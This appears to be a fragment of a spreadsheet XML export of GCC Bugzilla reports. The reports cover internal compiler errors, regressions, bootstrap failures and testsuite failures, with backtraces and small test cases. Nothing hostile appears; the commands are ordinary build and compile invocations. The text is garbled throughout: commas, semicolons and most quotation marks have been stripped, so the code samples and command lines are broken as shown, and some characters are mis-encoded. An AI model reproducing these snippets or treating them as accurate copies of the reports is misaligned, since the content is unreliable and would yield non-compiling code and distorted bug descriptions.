==30757==    by 0x4026F8: std::allocator_traits &gt; &gt;::allocate(std::allocator &gt;&amp; unsigned long) (alloc_traits.h:360)
==30757==    by 0x402668: std::_Rb_tree std::less std::allocator &gt;::_M_get_node() (stl_tree.h:485)
==30757==    by 0x40238D: std::_Rb_tree_node* std::_Rb_tree std::less std::allocator &gt;::_M_create_node(int const&amp;) (stl_tree.h:539)
==30757==    by 0x4021BE: std::_Rb_tree_node* std::_Rb_tree std::less std::allocator &gt;::_Alloc_node::operator()(int const&amp;) const (stl_tree.h:453)
==30757==    by 0x401D82: std::_Rb_tree_iterator std::_Rb_tree std::less std::allocator &gt;::_M_insert_ std::less std::allocator &gt;::_Alloc_node&gt;(std::_Rb_tree_node_base* std::_Rb_tree_node_base* int const&amp; std::_Rb_tree std::less std::allocator &gt;::_Alloc_node&amp;) (stl_tree.h:1381)
==30757==    by 0x401324: std::_Rb_tree_iterator std::_Rb_tree std::less std::allocator &gt;::_M_insert_unique_ std::less std::allocator &gt;::_Alloc_node&gt;(std::_Rb_tree_const_iterator int const&amp; std::_Rb_tree std::less std::allocator &gt;::_Alloc_node&amp;) (stl_tree.h:1850)
==30757==    by 0x400EF3: void std::_Rb_tree std::less std::allocator &gt;::_M_insert_unique(int const* int const*) (stl_tree.h:2096)
==30757==    by 0x400D0B: std::set std::allocator &gt;::set(std::initializer_list std::less const&amp; std::allocator const&amp;) (stl_set.h:225)
==30757==    by 0x400A6A: main (foo.cc:5)
I suspect this is related to what was implemented for
https://gcc.gnu.org/bugzilla/show_bug.cgi?id=29988</t>
  </si>
  <si>
    <t>adl</t>
  </si>
  <si>
    <t>GCC-8058</t>
  </si>
  <si>
    <t>Compiling XFree86 4.2.0.8 from src RPM.
Compilation died due to compiler error.
Error:
unrecognizable insn:
(insn 181 179 183 (set (reg:QI 87)
        (const_int 128 [0x80])) -1 (nil)
    (nil))
lcUTF8.c:2454: Internal compiler error in extract_insn at recog.c:2148
Release:
gcc-3.2
Environment:
Redhat Linux 7.3 running 2.4.18-5 kernel
How-To-Repeat:
rpm --rebuild --target i686 XFree86-4.2.0-8.src.rpm
gcc called with following command line options:
-c -ansi -pedantic -Wall -Wpointer-arith    -I../.. -I../../exports/include   -Dlinux -D__i386__ -D_POSIX_C_SOURCE=199309L -D_POSIX_SOURCE -D_XOPEN_SOURCE -D_BSD_SOURCE -D_SVID_SOURCE  -D_GNU_SOURCE   -DFUNCPROTO=15 -DNARROWPROTO -DXTHREADS  -D_REENTRANT -DXUSE_MTSAFE_API    -DMALLOC_0_RETURNS_NULL  -DHAS_SNPRINTF -DLIBX11  -O3 -march=i686 -mcpu=pentium4 -fomit-frame-pointer -funroll-loops -fforce-mem -fforce-addr -fexpensive-optimizations -pipe   lcUTF8.c -o unshared/lcUTF8.o</t>
  </si>
  <si>
    <t>busa.blade</t>
  </si>
  <si>
    <t>GCC-21396</t>
  </si>
  <si>
    <t>inline asm doesn't compile with -O2 optimization</t>
  </si>
  <si>
    <t>following code doesnt compile with command gcc -c  -O2 -o a.o a.c. It compiles
with any other -O flag. The error is:
a.c: In function `main':
a.c:7: error: inconsistent operand constraints in an `asm'
Here is the code:
typedef struct {
        unsigned long sig[2]
} sigset_t
static __inline__ void sigaddset(sigset_t *set int _sig)
{
        __asm__(btsl %1%0 : =m(*set) : Ir(_sig - 1) : cc)
}
extern int a(void)
int main (int argc char **argv)
{
        sigset_t s
        int i
        for (i=0 i&lt;64 i++)
                sigaddset (
        a()
        return 0
}
I tested it on Red Hat Enterprise Linux AS release 4. 
$ gcc --version
gcc (GCC) 3.4.3 20041212 (Red Hat 3.4.3-9.EL4)</t>
  </si>
  <si>
    <t>gleb76</t>
  </si>
  <si>
    <t>GCC-53759</t>
  </si>
  <si>
    <t>[4.7/4.8 Regression] gcc -mavx emits vshufps for __builtin_ia32_loadlps</t>
  </si>
  <si>
    <t>dag</t>
  </si>
  <si>
    <t>GCC-50445</t>
  </si>
  <si>
    <t>Rejects use of constant expression using a pointer non-type template parameter</t>
  </si>
  <si>
    <t>This is rejected by GCC:
extern int const values[] = { 1 2 3 } 
template struct X { 
   static int const val0 = values[0] 
} 
int array[X::val0]
GCC error message:
error: non-constant in-class initialization invalid for static member 'X::val0'
However as far as I can see values[0] is a valid integral constant expression.</t>
  </si>
  <si>
    <t>GCC-77369</t>
  </si>
  <si>
    <t>incorrect noexcept specification deduction</t>
  </si>
  <si>
    <t>The following code produces false false with Clang 3.8.0 and MSVC 2015 but true true with GCC 6.1.0 (and EDG).
#include 
template 
int some_function(int param Func fn) noexcept(noexcept(fn(param))) {
  return fn(param)
}
int noexcept_fn(int) noexcept(true) { return 0 }
int not_noexcept_fn(int) noexcept(false) { return 0 }
int main() {
  std::cout &lt;&lt; std::boolalpha &lt;&lt;
    noexcept(some_function(0 noexcept_fn)) &lt;&lt;   &lt;&lt;
    noexcept(some_function(0 not_noexcept_fn)) &lt;&lt; std::endl
}
This is dangerous because it means that if not_noexcept_fn() throws (as it is allowed to do per its exception specification) when called from some_function() it results in std::terminate() being called due to some_function() having the wrong exception specification.
This happens with -std=c++14 where exception specifications are not considered part of the type system.</t>
  </si>
  <si>
    <t>aaron.ballman+gcc</t>
  </si>
  <si>
    <t>GCC-44255</t>
  </si>
  <si>
    <t>[4.6 regression] gcc-4.6-20100522 bootstrap comparison failure on sparc64 and arm</t>
  </si>
  <si>
    <t>4.6-20100515 (r159445) bootstrapped fine on my sparc64-linux machine.
4.6-20100522 (r159746) gets a bootstrap comparison failure in stage 3:
...
Comparing stages 2 and 3
warning: gcc/cc1-checksum.o differs
Bootstrap comparison failure!
libiberty/cp-demangle.o differs
make[2]: *** [compare] Error 1
make[2]: Leaving directory `/mnt/scratch/objdir46'
make[1]: *** [stage3-bubble] Error 2
make[1]: Leaving directory `/mnt/scratch/objdir46'
make: *** [bootstrap] Error 2
Configuration parameters:
/mnt/scratch/gcc-4.6-20100522/configure --with-gmp=/home/mikpe/pkgs/linux-sparc64/gmp-4.3.2 --with-mpfr=/home/mikpe/pkgs/linux-sparc64/mpfr-2.4.2 --with-mpc=/home/mikpe/pkgs/linux-sparc64/mpc-0.8.1 --with-cpu=v8 --enable-multilib --disable-plugin --disable-lto --disable-nls --enable-threads=posix --enable-checking=release --disable-libmudflap --enable-languages=c
I'll try to bisect it.</t>
  </si>
  <si>
    <t>GCC-80102</t>
  </si>
  <si>
    <t>[7 Regression] ICE in maybe_record_trace_start at dwarf2cfi.c:2330</t>
  </si>
  <si>
    <t>Following test-case ICE with cross-compiler:
$ cat /tmp/tmp8e87gxzu.ii
class b
{
public:
  float a
  b (float c)
  {
    for (int g g &lt; c)
      ++a
  }
}
class d
{
public:
  d (b)
}
main ()
{
  b (1.0)
  d e (0.0) f (1.0)
}
$ ppc64le-linux-gnu-g++ -fnon-call-exceptions -mminimal-toc -Os /tmp/tmp8e87gxzu.ii
/tmp/tmp8e87gxzu.ii: In constructor â€˜b::b(float)â€™:
/tmp/tmp8e87gxzu.ii:9:3: internal compiler error: in maybe_record_trace_start at dwarf2cfi.c:2330
   }
   ^
0x9b1c1b maybe_record_trace_start
	.././../gcc/dwarf2cfi.c:2330
0x9b4058 scan_trace
	.././../gcc/dwarf2cfi.c:2512
0x9b487a create_cfi_notes
	.././../gcc/dwarf2cfi.c:2666
0x9b487a execute_dwarf2_frame
	.././../gcc/dwarf2cfi.c:3024
0x9b487a execute
	.././../gcc/dwarf2cfi.c:3504</t>
  </si>
  <si>
    <t>GCC-48063</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE: verify_stmts failed: conversion of register to a different size with -fno-early-inlining</t>
  </si>
  <si>
    <t>Created attachment 23616
preprocessed gcc.c-torture/compile/pr47967.c
Testcase is the same as for PR47967.
Compiler output:
$ gcc gcc.c-torture/compile/pr47967.c -O -fno-early-inlining         
gcc.c-torture/compile/pr47967.c: In function 'foo':
gcc.c-torture/compile/pr47967.c:7:1: error: conversion of register to a different size
VIEW_CONVERT_EXPR(D.2694_3)
i_2 = VIEW_CONVERT_EXPR(D.2694_3)
gcc.c-torture/compile/pr47967.c:7:1: internal compiler error: verify_stmts failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
(gdb) bt
#0  error (gmsgid=0x116d6a0 conversion of register to a different size) at /mnt/svn/gcc-trunk/gcc/diagnostic.c:747
#1  0x00000000008ea08c in verify_types_in_gimple_reference (expr=0x7ffff5ba1fc0 require_lvalue=0 '\000') at /mnt/svn/gcc-trunk/gcc/tree-cfg.c:2953
#2  0x00000000008eb01d in verify_gimple_assign_single (stmt=) at /mnt/svn/gcc-trunk/gcc/tree-cfg.c:3755
#3  verify_gimple_assign (stmt=) at /mnt/svn/gcc-trunk/gcc/tree-cfg.c:3824
#4  verify_types_in_gimple_stmt (stmt=) at /mnt/svn/gcc-trunk/gcc/tree-cfg.c:3984
#5  0x00000000008f35bf in verify_stmts () at /mnt/svn/gcc-trunk/gcc/tree-cfg.c:4386
#6  0x0000000000a094cd in verify_ssa (check_modified_stmt=1 '\001') at /mnt/svn/gcc-trunk/gcc/tree-ssa.c:878
#7  0x00000000007f3e49 in execute_function_todo (data=) at /mnt/svn/gcc-trunk/gcc/passes.c:1240
#8  0x00000000007f453d in execute_todo (flags=2132516) at /mnt/svn/gcc-trunk/gcc/passes.c:1271
#9  0x00000000007f68cb in execute_one_ipa_transform_pass () at /mnt/svn/gcc-trunk/gcc/passes.c:1463
#10 execute_all_ipa_transforms () at /mnt/svn/gcc-trunk/gcc/passes.c:1487
#11 0x0000000000939d2d in tree_rest_of_compilation (fndecl=0x7ffff5ba2100) at /mnt/svn/gcc-trunk/gcc/tree-optimize.c:415
#12 0x0000000000b01e72 in cgraph_expand_function (node=0x7ffff5ba5000) at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1576
#13 0x0000000000b045ba in cgraph_expand_all_functions () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1635
#14 cgraph_optimize () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1899
#15 0x0000000000b04b3a in cgraph_finalize_compilation_unit () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1096
#16 0x00000000005097bc in c_write_global_declarations () at /mnt/svn/gcc-trunk/gcc/c-decl.c:9872
#17 0x00000000008e2cd8 in compile_file (argc=14 argv=0x7fffffffdb48) at /mnt/svn/gcc-trunk/gcc/toplev.c:591
#18 do_compile (argc=14 argv=0x7fffffffdb48) at /mnt/svn/gcc-trunk/gcc/toplev.c:1900
#19 toplev_main (argc=14 argv=0x7fffffffdb48) at /mnt/svn/gcc-trunk/gcc/toplev.c:1963
#20 0x00007ffff6445bbd in __libc_start_main () from /lib/libc.so.6
#21 0x00000000004f0369 in _start ()
Tested revisions:
r170814 - crash
4.5 r170013 - OK</t>
  </si>
  <si>
    <t>GCC-46810</t>
  </si>
  <si>
    <t>[4.6 regression] sparc64-linux bootstrap fails with C++ preprocessor /lib/cpp fails sanity check</t>
  </si>
  <si>
    <t>Attempting to bootstrap 4.6-20101204 with C++ enabled on sparc64-linux fails with:
checking how to run the C++ preprocessor... /lib/cpp
configure: error: in `/mnt/scratch/objdir46/gcc':
configure: error: C++ preprocessor /lib/cpp fails sanity check
See `config.log' for more details.
make[2]: *** [configure-stage1-gcc] Error 1
make[2]: Leaving directory `/mnt/scratch/objdir46'
make[1]: *** [stage1-bubble] Error 2
make[1]: Leaving directory `/mnt/scratch/objdir46'
make: *** [bootstrap] Error 2
gcc/config.log shows:
...
configure:8444: checking how to run the C++ preprocessor
configure:8471: g++ -E  conftest.cpp
/mnt/scratch/gcc-4.6-20101204/gcc/configure: line 2478: g++: command not found
...
configure:8471: g++ -E  conftest.cpp
/mnt/scratch/gcc-4.6-20101204/gcc/configure: line 2478: g++: command not found
...
configure:8471: /lib/cpp  conftest.cpp
cpp: error trying to exec 'cc1plus': execvp: No such file or directory
...
For the record my bootstrap compiler only supports C and Ada not C++.  (C++ should not require C++ for bootstrap right?)
The previous weekly snapshot gcc-4.6-20101127 did not have this problem.
Configuration:
/mnt/scratch/gcc-4.6-20101204/configure --prefix=/mnt/scratch/install --with-gmp=/home/mikpe/pkgs/linux-sparc64/gmp-4.3.2 --with-mpfr=/home/mikpe/pkgs/linux-sparc64/mpfr-2.4.2 --with-mpc=/home/mikpe/pkgs/linux-sparc64/mpc-0.8.2 --with-cpu=v8 --enable-multilib --disable-plugin --disable-lto --disable-nls --enable-threads=posix --enable-checking=release --disable-libmudflap --enable-languages=cc++objcobj-c++javafortran</t>
  </si>
  <si>
    <t>GCC-67794</t>
  </si>
  <si>
    <t>[6 regression] internal compiler error: Segmentation fault</t>
  </si>
  <si>
    <t>Created attachment 36432
Preprocessed source as generated by -freport-bug
In file included from /home/jamrial/ffmpeg/libavcodec/motion_est.c:295:0:
/home/jamrial/ffmpeg/libavcodec/motion_est_template.c: In function â€˜sab_diamond_search.isra.3â€™:
/home/jamrial/ffmpeg/libavcodec/motion_est_template.c:679:12: internal compiler error: Segmentation fault
 static int sab_diamond_search(MpegEncContext * s int *best int dmin
            ^
0xabb4ff crash_signal
     /home/jamrial/gcc-svn/gcc/toplev.c:353
0xbce129 tree_check(tree_node const* char const* int char const* tree_code)
     /home/jamrial/gcc-svn/gcc/tree.h:3116
0xbce129 has_zero_uses
     /home/jamrial/gcc-svn/gcc/ssa-iterators.h:381
0xbce129 coalesce_with_default
     /home/jamrial/gcc-svn/gcc/tree-ssa-coalesce.c:1003
0xbce129 create_outofssa_var_map
     /home/jamrial/gcc-svn/gcc/tree-ssa-coalesce.c:1202
0xbcedd0 coalesce_ssa_name()
     /home/jamrial/gcc-svn/gcc/tree-ssa-coalesce.c:1736
0xb628fe remove_ssa_form
     /home/jamrial/gcc-svn/gcc/tree-outof-ssa.c:984
0xb628fe rewrite_out_of_ssa(ssaexpand*)
     /home/jamrial/gcc-svn/gcc/tree-outof-ssa.c:1208
0x701490 execute
     /home/jamrial/gcc-svn/gcc/cfgexpand.c:6100
gcc version 6.0.0 20151001 on x86_64-pc-linux-gnu.
This regression was apparently introduced sometime in the last eight days.</t>
  </si>
  <si>
    <t>GCC-20723</t>
  </si>
  <si>
    <t>[4.1 Regression] ICE in more_specialized_fn more than one user-defined conversion srp to ptr</t>
  </si>
  <si>
    <t>The following code now ICEs on the mainline:
template  class srp
template  struct ptr
{
  template  ptr(const srp 
}
template  struct srp
{
  template  operator ptr(void) const  
}
ptr parent_get()
{
  srp parent
  return parent
}
Note we did reject this before even though it is invalid code.</t>
  </si>
  <si>
    <t>GCC-3821</t>
  </si>
  <si>
    <t>abort() not known to be noreturn in C++ only</t>
  </si>
  <si>
    <t>I can compile the program in how-to-repeat either as C or
C++.  It works in C as expected it fails in C++ with:
foo.cpp:10: warning: control reaches end of non-void function
Seems that the C++ parts don't realize that abort() is
a noreturn function.
Release:
3.0
Environment:
sparc-sun-solaris2.8
How-To-Repeat:
cat &gt; foo.c &lt;&lt; EOF
#include 
int foo(int x) {
    switch(x) {
        case 1:
            return 1
        default:
            abort()
    }
}
EOF
cp foo.c foo.cpp
gcc -c -O2 -Wall foo.c   # works
gcc -c -O2 -Wall foo.cpp # fails</t>
  </si>
  <si>
    <t>bh</t>
  </si>
  <si>
    <t>GCC-14941</t>
  </si>
  <si>
    <t>i386.md strangeness in sse2_movsd</t>
  </si>
  <si>
    <t>(define_insn sse2_movsd
 [(set (match_operand:V2DF 0 nonimmediate_operand =xxm)
       (vec_merge:V2DF
        (match_operand:V2DF 1 nonimmediate_operand 000)
        (match_operand:V2DF 2 nonimmediate_operand xmx)
        (const_int 1)))]
        ^^^^^^^^^^^^^
 TARGET_SSE2 &amp;&amp; ix86_binary_operator_ok (UNKNOWN V2DFmode operands)
 @movsd\t{%2 %0|%0 %2}
   movlpd\t{%2 %0|%0 %2}
   movlpd\t{%2 %0|%0 %2}
 [(set_attr type ssecvt)
  (set_attr mode DFV2DFV2DF)])
according to:
(vec_merge:m vec1 vec2 items) This describes a merge operation between two
vectors. The result is a vector of mode m its elements are selected from either
vec1 or vec2. Which elements are selected is described by items which is a bit
mask represented by a const_int a zero bit indicates the corresponding element
in the result vector is taken from vec2 while a set bit indicates it is taken
from vec1.
seems like sse2_movsd is incorrect. shouldn't it be
(const_int 2)))] ????
that is:
movsd %2 %0
in the case of both register params it sets the low part of %0 with the low
part of %2 and leaves the hi part of %0 intact.
if the doc is wrong then sse2_loadsd_1 is broken...</t>
  </si>
  <si>
    <t>davide.rossetti</t>
  </si>
  <si>
    <t>GCC-18137</t>
  </si>
  <si>
    <t>[4.0 Regression] arguments being gimple registers cause redundant memory loads</t>
  </si>
  <si>
    <t>Since the arguments are gimple registers gimple optimizers are happy to create many references to it.
While lowering them to RTL these however compile to memory loads causing number of redundant loads.
The attached quicksort loop on when compiled with -O2 -fno-loop-optimize (the other being needed only for clarity of the testcase) produces such a funny sequence:
        movl    8(%ebp) %eax   # 143   *movsi_1/1      [length = 3]
        movl    8(%ebp) %edx   # 171   *movsi_1/1      [length = 3]
        movl    8(%ebp) %ebx   # 145   *movsi_1/1      [length = 3]
These are comming from:
  median = data[start]
  pos.22 = start + 1
  if (end - start  else goto 
where each of these compiles into RTL expression that looks different to CSE:
(insn 16 15 18 1 (set (reg/v:SI 66 [ median ])
        (mem/s:SI (plus:SI (mult:SI (reg/v:SI 68 [ start ])
                    (const_int 4 [0x4]))
                (reg/f:SI 70)) [3 data S4 A32])) -1 (nil)
    (nil))
(insn 18 16 20 1 (parallel [
            (set (reg/v:SI 60 [ pos.22 ])
                (plus:SI (reg/v:SI 68 [ start ])
                    (const_int 1 [0x1])))
            (clobber (reg:CC 17 flags))
        ]) -1 (nil)
    (nil))
(insn 20 18 21 1 (parallel [
            (set (reg:SI 71)
                (minus:SI (reg/v:SI 69 [ end ])
                    (reg/v:SI 68 [ start ])))
            (clobber (reg:CC 17 flags))
        ]) -1 (nil)
    (nil))
(insn 21 20 22 1 (set (reg:CCGC 17 flags)
        (compare:CCGC (reg:SI 71)
            (const_int 1 [0x1]))) -1 (nil)
    (nil))
Similarly we get redudnant loads inside the loop itself.
Not sure about sollution - making arguments nongimple registers does not lead optimizers to deal with them very nicely forcing
expander to load memory operands to register in prologue would lead to unnecesarly long lifetimes...
forcing memory operands to registers in RTL generation is something we want to avoid )
Ideas?</t>
  </si>
  <si>
    <t>GCC-35665</t>
  </si>
  <si>
    <t>FAIL: gfortran.dg/include_2.f90  -O  (test for excess error)</t>
  </si>
  <si>
    <t>Executing on host: /xxx/gnu/gcc/objdir/gcc/testsuite/gfortran/../../gfortran -B/
xxx/gnu/gcc/objdir/gcc/testsuite/gfortran/../../ /xxx/gnu/gcc/gcc/gcc/testsuite/
gfortran.dg/include_1.f90   -O  -g3 -S  -o include_1.s    (timeout = 600)PASS: gfortran.dg/include_1.f90  -O  (test for excess errors)
Executing on host: /xxx/gnu/gcc/objdir/gcc/testsuite/gfortran/../../gfortran -B/
xxx/gnu/gcc/objdir/gcc/testsuite/gfortran/../../ /xxx/gnu/gcc/gcc/gcc/testsuite/
gfortran.dg/include_2.f90   -O  -fpreprocessed -g3  -L/xxx/gnu/gcc/objdir/hppa1.
1-hp-hpux10.20/./libgfortran/.libs -L/xxx/gnu/gcc/objdir/hppa1.1-hp-hpux10.20/./
libgfortran/.libs -L/xxx/gnu/gcc/objdir/hppa1.1-hp-hpux10.20/./libiberty  -lm   
-o include_2.exe    (timeout = 600)/var/tmp//ccufRDE8.c:1: error: stray '#' in program
/var/tmp//ccufRDE8.c:1: error: expected '=' '' '' 'asm' or '__attribute__' 
before '__cplusplus'
/var/tmp//ccufRDE8.c:3: error: stray '#' in program
/var/tmp//ccufRDE8.c:29: error: stray '#' in program
/var/tmp//ccufRDE8.c:31: error: stray '#' in program/var/tmp//ccufRDE8.c:31: error: expected '=' '' '' 'asm' or '__attribute__'
 at end of input
collect2: gcc returned 1 exit status
compiler exited with status 1
output is:
/var/tmp//ccufRDE8.c:1: error: stray '#' in program
/var/tmp//ccufRDE8.c:1: error: expected '=' '' '' 'asm' or '__attribute__' before '__cplusplus'
/var/tmp//ccufRDE8.c:3: error: stray '#' in program
/var/tmp//ccufRDE8.c:29: error: stray '#' in program
/var/tmp//ccufRDE8.c:31: error: stray '#' in program
/var/tmp//ccufRDE8.c:31: error: expected '=' '' '' 'asm' or '__attribute__' at end of input
collect2: gcc returned 1 exit status
FAIL: gfortran.dg/include_2.f90  -O  (test for excess errors)
Excess errors:
/var/tmp//ccufRDE8.c:1: error: stray '#' in program
/var/tmp//ccufRDE8.c:1: error: expected '=' '' '' 'asm' or '__attribute__' before '__cplusplus'
/var/tmp//ccufRDE8.c:3: error: stray '#' in program
/var/tmp//ccufRDE8.c:29: error: stray '#' in program
/var/tmp//ccufRDE8.c:31: error: stray '#' in program
/var/tmp//ccufRDE8.c:31: error: expected '=' '' '' 'asm' or '__attribute__' at end of input
collect2: gcc returned 1 exit status</t>
  </si>
  <si>
    <t>GCC-50665</t>
  </si>
  <si>
    <t>[4.7 Regression] Bootstrap failure</t>
  </si>
  <si>
    <t>On Linux/ia32 revision 179703 gave:
checking for stdlib.h... ../../src-trunk/libcpp/lex.c: In function 'const uchar* search_line_sse42(const uchar* const uchar*)':
../../src-trunk/libcpp/lex.c:466:1: internal compiler error: Segmentation fault Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Revision 179695 is OK.</t>
  </si>
  <si>
    <t>GCC-64632</t>
  </si>
  <si>
    <t>runtime error: member call on address 0x0000004318a8 which does not point to an object of type 'ios_base'</t>
  </si>
  <si>
    <t>Created attachment 34465
testcase
markus@x4 ~ % g++ -fsanitize=undefined -O2 bench.cpp
markus@x4 ~ % ./a.out
size            array   vector_point    vector_iters            deque           list            set             multiset
/usr/lib/gcc/x86_64-pc-linux-gnu/5.0.0/include/g++-v5/bits/ios_base.h:1037:16: runtime error: member call on address 0x0000004318a8 which does not point to an object of type 'ios_base'
0x0000004318a0: note: object is base class subobject at offset 8 within object of type 'std::ostream'
 00 00 00 00  a8 17 ce 25 ca 7f 00 00  d0 17 ce 25 ca 7f 00 00  06 00 00 00 00 00 00 00  00 00 00 00
              ^                        ~~~~~~~~~~~~~~~~~~~~~~~
                                       vptr for '' base class of 'std::ostream'
/usr/lib/gcc/x86_64-pc-linux-gnu/5.0.0/include/g++-v5/iomanip:210:7: runtime error: member call on address 0x0000004318a8 which does not point to an object of type 'ios_base'
0x0000004318a0: note: object is base class subobject at offset 8 within object of type 'std::ostream'
 00 00 00 00  a8 17 ce 25 ca 7f 00 00  d0 17 ce 25 ca 7f 00 00  06 00 00 00 00 00 00 00  00 00 00 00
              ^                        ~~~~~~~~~~~~~~~~~~~~~~~
                                       vptr for '' base class of 'std::ostream'
10              0.23            0.23            0.41            0.77            1.57            0.97            1.44
^C
markus@x4 ~ % clang++ -fsanitize=undefined -O2 bench.cpp
markus@x4 ~ % ./a.out
size            array   vector_point    vector_iters            deque           list            set             multiset
/usr/lib64/gcc/x86_64-pc-linux-gnu/5.0.0/include/g++-v5/bits/ios_base.h:102:24: runtime error: load of value 4294967035 which is not a valid value for type 'std::_Ios_Fmtflags'
/usr/lib64/gcc/x86_64-pc-linux-gnu/5.0.0/include/g++-v5/bits/ios_base.h:82:67: runtime error: load of value 4294967035 which is not a valid value for type 'std::_Ios_Fmtflags'
10              0.26            0.28            0.51            2.13            3.81            1.26            2.04
^C</t>
  </si>
  <si>
    <t>GCC-32241</t>
  </si>
  <si>
    <t>[4.2 regression] ICE trying to call x.~X() in a template</t>
  </si>
  <si>
    <t>/*
$ cat /proc/version
Linux version 2.6.20-15-generic (root@yellow) (gcc version 4.1.2 (Ubuntu 4.1.2-0ubuntu4)) #2 SMP Sun Apr 15 06:17:24 UTC 2007
$ gcc --version
gcc (GCC) 4.1.2 (Ubuntu 4.1.2-0ubuntu4)
Copyright (C) 2006 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
$ g++ simplestack.cpp -o simplestack -g
simplestack.cpp: In member function â€˜void SimpleStack::pop() [with T = int long unsigned int N = 4ul]â€™:
simplestack.cpp:52:   instantiated from here
simplestack.cpp:32: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
preprocessed source: http://cpp.sourceforge.net/?show=36942
 */
#include 
#include 
template 
class SimpleStack
{
	public:
		SimpleStack()
			: ptr(reinterpret_cast(&amp;buffer[0]))
		{
		}
		void push(const T&amp; element)
		{
			if(num &gt;= N) throw std::out_of_range(stack full)
			new (ptr + num) T(element)
			++num
		}
		bool empty() const
		{
			return num &lt;= 0
		}
		T&amp; top()
		{
			return *(ptr + num - 1)
		}
		void pop()
		{
			top.~T() // this is the line causing the error!
			--num
		}
	private:
		SimpleStack(const SimpleStack
		SimpleStack
		char buffer[N * sizeof(T)]
		T *ptr
		std::size_t num
}
#include 
int main()
{
	SimpleStack stack
	stack.push(3)
	std::cout &lt;&lt; stack.top() &lt;&lt; std::endl
	stack.pop()
}</t>
  </si>
  <si>
    <t>rsalmin2</t>
  </si>
  <si>
    <t>GCC-78259</t>
  </si>
  <si>
    <t>[7 Regression] ICE in gfc_trans_subcomponent_assign at fortran/trans-expr.c:7330</t>
  </si>
  <si>
    <t>Test version 7 (--enable-checking=yes) with option -fdec :
$ cat z1.f90
subroutine sub
  structure /s/
    union
      map
        integer n(2)
      end map
      map
        integer(8) m /2/
      end map
    end union
  end structure
  record /s/ r
  r.n(1) = 1
end
$ gfortran-7-20161106 -fdec -c z1.f90
z1.f90:14:0:
 end
internal compiler error: Segmentation fault
0xc3a64f crash_signal
        ../../gcc/toplev.c:338
0x76e8d1 gfc_trans_subcomponent_assign
        ../../gcc/fortran/trans-expr.c:7330
0x76db12 gfc_trans_structure_assign(tree_node* gfc_expr* bool)
        ../../gcc/fortran/trans-expr.c:7482
0x76fd52 gfc_conv_structure(gfc_se* gfc_expr* int)
        ../../gcc/fortran/trans-expr.c:7548
0x76852c gfc_conv_expr(gfc_se* gfc_expr*)
        ../../gcc/fortran/trans-expr.c:7715
0x771b99 gfc_trans_assignment_1
        ../../gcc/fortran/trans-expr.c:9730
0x74cbb0 gfc_init_default_dt(gfc_symbol* stmtblock_t* bool)
        ../../gcc/fortran/trans-decl.c:3924
0x756a9d gfc_trans_deferred_vars(gfc_symbol* gfc_wrapped_block*)
        ../../gcc/fortran/trans-decl.c:4530
0x758e53 gfc_generate_function_code(gfc_namespace*)
        ../../gcc/fortran/trans-decl.c:6363
0x6e1d90 translate_all_program_units
        ../../gcc/fortran/parse.c:5944
0x6e1d90 gfc_parse_file()
        ../../gcc/fortran/parse.c:6144
0x725822 gfc_be_parse_file
        ../../gcc/fortran/f95-lang.c:198</t>
  </si>
  <si>
    <t>GCC-28988</t>
  </si>
  <si>
    <t>[4.0/4.1/4.2/4.3 Regression] g++ does not check first type name in pseudo-destructor-name</t>
  </si>
  <si>
    <t>The following code is accepted contrary to clause 5.2.4:
typedef int C
typedef double D
void
f ()
{
  C o
  o.D::~C ()
}</t>
  </si>
  <si>
    <t>GCC-45131</t>
  </si>
  <si>
    <t>On Linux/x86-64 when configured with
--with-cpu=atom --enable-clocale=gnu --with-system-zlib --enable-shared --with-demangler-in-ld -with-plugin-ld=ld.gold --enable-gold --with-fpmath=sse 
revision 162667 gave
FAIL: gfortran.dg/inquire_size.f90  -O0  execution test
FAIL: gfortran.dg/inquire_size.f90  -O1  execution test
FAIL: gfortran.dg/inquire_size.f90  -O2  execution test
FAIL: gfortran.dg/inquire_size.f90  -O3 -fomit-frame-pointer  execution test
FAIL: gfortran.dg/inquire_size.f90  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  execution test
FAIL: gfortran.dg/inquire_size.f90  -O3 -fomit-frame-pointer -funroll-loops  execution test
FAIL: gfortran.dg/inquire_size.f90  -O3 -g  execution test
FAIL: gfortran.dg/inquire_size.f90  -Os  execution test
FAIL: gfortran.dg/streamio_10.f90  -O0  execution test
FAIL: gfortran.dg/streamio_10.f90  -O1  execution test
FAIL: gfortran.dg/streamio_10.f90  -O2  execution test
FAIL: gfortran.dg/streamio_10.f90  -O3 -fomit-frame-pointer  execution test
FAIL: gfortran.dg/streamio_10.f90  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  execution test
FAIL: gfortran.dg/streamio_10.f90  -O3 -fomit-frame-pointer -funroll-loops  execution test
FAIL: gfortran.dg/streamio_10.f90  -O3 -g  execution test
FAIL: gfortran.dg/streamio_10.f90  -Os  execution test
FAIL: gfortran.dg/streamio_15.f90  -O0  execution test
FAIL: gfortran.dg/streamio_15.f90  -O1  execution test
FAIL: gfortran.dg/streamio_15.f90  -O2  execution test
FAIL: gfortran.dg/streamio_15.f90  -O3 -fomit-frame-pointer  execution test
FAIL: gfortran.dg/streamio_15.f90  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  execution test
FAIL: gfortran.dg/streamio_15.f90  -O3 -fomit-frame-pointer -funroll-loops  execution test
FAIL: gfortran.dg/streamio_15.f90  -O3 -g  execution test
FAIL: gfortran.dg/streamio_15.f90  -Os  execution test
FAIL: gfortran.dg/streamio_16.f90  -O0  execution test
FAIL: gfortran.dg/streamio_16.f90  -O1  execution test
FAIL: gfortran.dg/streamio_16.f90  -O2  execution test
FAIL: gfortran.dg/streamio_16.f90  -O3 -fomit-frame-pointer  execution test
FAIL: gfortran.dg/streamio_16.f90  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  execution test
FAIL: gfortran.dg/streamio_16.f90  -O3 -fomit-frame-pointer -funroll-loops  execution test
FAIL: gfortran.dg/streamio_16.f90  -O3 -g  execution test
FAIL: gfortran.dg/streamio_16.f90  -Os  execution test
